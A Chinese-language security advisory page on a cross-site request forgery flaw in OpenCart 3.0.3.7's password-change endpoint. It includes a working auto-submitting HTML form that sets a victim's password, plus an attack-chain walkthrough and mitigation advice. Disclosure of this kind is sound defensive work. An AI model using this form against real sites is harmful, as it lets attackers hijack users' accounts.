CVE-2021-47953 CVSS 4.3 中危

CVE-2021-47953 OpenCart跨站请求伪造漏洞

披露日期: 2026-05-10

来源: [email protected]

漏洞信息

漏洞编号

CVE-2021-47953

漏洞类型

跨站请求伪造 (CSRF)

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenCart

漏洞概述

OpenCart 3.0.3.7版本存在跨站请求伪造（CSRF）漏洞。由于`account/password`接口缺乏有效的CSRF防护机制，攻击者可以诱导已认证的用户访问恶意链接或提交特制的表单请求。一旦用户触发了该请求，其账户密码将在不知情的情况下被攻击者修改，从而导致账户被劫持。

技术细节

该漏洞源于OpenCart在处理用户密码修改请求时，未对关键状态更改操作实施充分的CSRF令牌验证或Referer来源检查。攻击者可构建一个包含隐藏表单的恶意HTML页面，表单目标指向受害者的OpenCart站点`account/password`端点，并预设了`password`和`confirm`参数。当已登录用户访问该页面时，浏览器会自动携带用户的会话Cookie发送POST请求。服务器无法区分请求来源的合法性，直接执行了密码更新逻辑，导致攻击者可接管用户账户。

攻击链分析

STEP 1

侦察

攻击者确认目标站点使用的是存在漏洞的OpenCart 3.0.3.7版本。

STEP 2

构建载荷

攻击者编写包含恶意HTML表单的页面，表单指向账户密码修改接口，并预设新密码。

STEP 3

传递载荷

攻击者通过社会工程学手段（如钓鱼邮件）诱导已登录的管理员或用户访问恶意链接。

STEP 4

执行攻击

受害者浏览器在后台自动提交表单，携带Session Cookie向服务器发送修改密码请求。

STEP 5

达成效果

服务器接收请求并修改密码，攻击者随即可以使用新密码登录受害者账户。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- Proof of Concept for CVE-2021-47953 -->
<!-- Host this file on an attacker-controlled server -->
<html>
  <body>
    <form action="http://target-site.com/index.php?route=account/password" method="POST">
      <input type="hidden" name="password" value="attacker123" />
      <input type="hidden" name="confirm" value="attacker123" />
      <input type="submit" value="Click me" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

影响范围

OpenCart 3.0.3.7

防御指南

临时缓解措施

建议用户在访问外部链接时保持警惕，不要轻易点击不明来源的链接。对于管理员，建议在未修复前通过WAF拦截针对`account/password`端点的非同源POST请求，或暂时禁用密码修改功能直至补丁应用。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表